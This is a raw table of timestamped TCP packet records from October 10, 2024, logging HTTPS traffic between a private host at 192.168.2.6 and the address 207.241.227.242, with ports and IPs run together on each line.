                                                    Oct 10, 2024 10:00:04.371840954 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.371876001 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.372354984 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.372375965 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.372406006 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.372415066 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.372436047 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.372453928 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.372905016 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.372922897 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.372967005 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.372975111 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.373013973 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.373420954 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.373446941 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.373485088 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.373492002 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.373506069 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.373528957 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.373858929 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.373914957 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.373934984 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.373979092 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.373987913 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.374027014 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.374092102 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.374422073 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.374439001 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.374478102 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.374486923 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.374531984 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.374914885 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.374933004 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.374970913 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.374979019 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375016928 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375307083 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375324011 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375354052 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375363111 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375390053 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375410080 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375516891 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375533104 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375579119 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375586033 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375626087 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375634909 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375652075 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375677109 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375683069 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375705004 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375727892 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375730038 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375745058 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375766993 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375773907 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375806093 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375813961 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375833988 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375850916 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375853062 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375864029 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375879049 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375911951 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.375946999 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375983953 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.375999928 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376008987 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376027107 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376039982 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376048088 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376055002 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376072884 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376082897 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376111984 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376120090 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376138926 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376154900 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376161098 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376169920 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376182079 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376215935 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376220942 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376233101 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376251936 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376271963 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376280069 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376291037 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376312017 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376341105 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376355886 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376411915 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376439095 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376446009 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376471996 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376482010 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376494884 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376502991 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376512051 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376534939 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376549006 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376569033 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376597881 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376602888 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376616955 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376621962 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376636028 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376665115 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376677990 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376689911 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376717091 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376789093 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376808882 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376837969 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376846075 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.376866102 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.376873970 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.377173901 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.377191067 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.377227068 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.377235889 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.377252102 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.377290010 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.377461910 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.377480030 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.377516031 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.377525091 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.377541065 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.377558947 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.378048897 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.378071070 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.378110886 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.378118992 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.378129959 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.378140926 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.378154993 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.378177881 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.378185034 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.378201008 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.378222942 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.378489017 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.378511906 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.378561974 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.378570080 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.378583908 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.378613949 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.378709078 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.378734112 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.378762007 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.378768921 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:04.378796101 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.378804922 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:04.401108980 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.091097116 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.091109991 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.091161013 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.091190100 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.091204882 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.091247082 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.091276884 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.091428041 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.091463089 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.091527939 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.091536999 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.091586113 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.091743946 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.091762066 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.091820002 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.091829062 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.091871977 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.092169046 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.092190027 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.092240095 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.092247009 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.092283010 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.092530012 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.092545033 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.092602015 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.092608929 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.092648983 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.092912912 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.092927933 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.092981100 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.092993021 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.093030930 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.093389988 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.093405008 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.093466997 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.093477011 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.093518972 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.093656063 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.093672037 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.093724966 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.093732119 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.093781948 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.094038010 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.094053030 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.094125986 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.094134092 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.094182014 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.094501019 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.094516039 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.094577074 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.094583035 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.094624996 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.094901085 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.094927073 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.094966888 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.094975948 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.094988108 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.095029116 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.095243931 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.095258951 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.095320940 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.095330954 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.095371962 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.095694065 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.095714092 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.095763922 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.095772028 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.095817089 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.095840931 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.095860004 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.095913887 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.095920086 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.095971107 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.095980883 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.095995903 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096056938 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096065998 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096079111 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096115112 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096122980 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096139908 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096155882 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096167088 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096194983 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096209049 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096225023 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096271992 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096281052 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096295118 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096314907 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096321106 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096328020 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096363068 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096374989 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096390963 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096415043 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096415043 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096426010 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096445084 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096446037 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096467972 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096472979 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096479893 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096503019 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096514940 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096528053 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096541882 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096585035 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096591949 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096604109 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096623898 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096631050 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096637964 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096649885 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096678972 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096683025 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096692085 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096715927 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096726894 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096735001 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096757889 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096761942 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096775055 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096782923 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096793890 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096811056 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096837044 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096844912 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096859932 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096870899 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096880913 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096889019 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096910000 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096925020 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096931934 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096939087 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096960068 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096978903 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.096983910 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.096999884 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097002983 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097021103 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097023010 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097033024 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097048044 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097084045 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097105980 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097121954 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097122908 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097151041 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097157001 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097172022 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097179890 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097183943 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097189903 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097212076 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097224951 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097232103 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097255945 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097259045 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097274065 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097278118 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097285986 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097304106 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097337008 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097340107 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097352982 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097372055 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097384930 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097393990 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097414970 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097414970 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097434998 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097444057 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097491026 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097491026 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097570896 CEST49711443192.168.2.6207.241.227.242
                                                    Oct 10, 2024 10:00:05.097661972 CEST44349711207.241.227.242192.168.2.6
                                                    Oct 10, 2024 10:00:05.097683907 CEST44349711207.241.227.242192.168.2.6
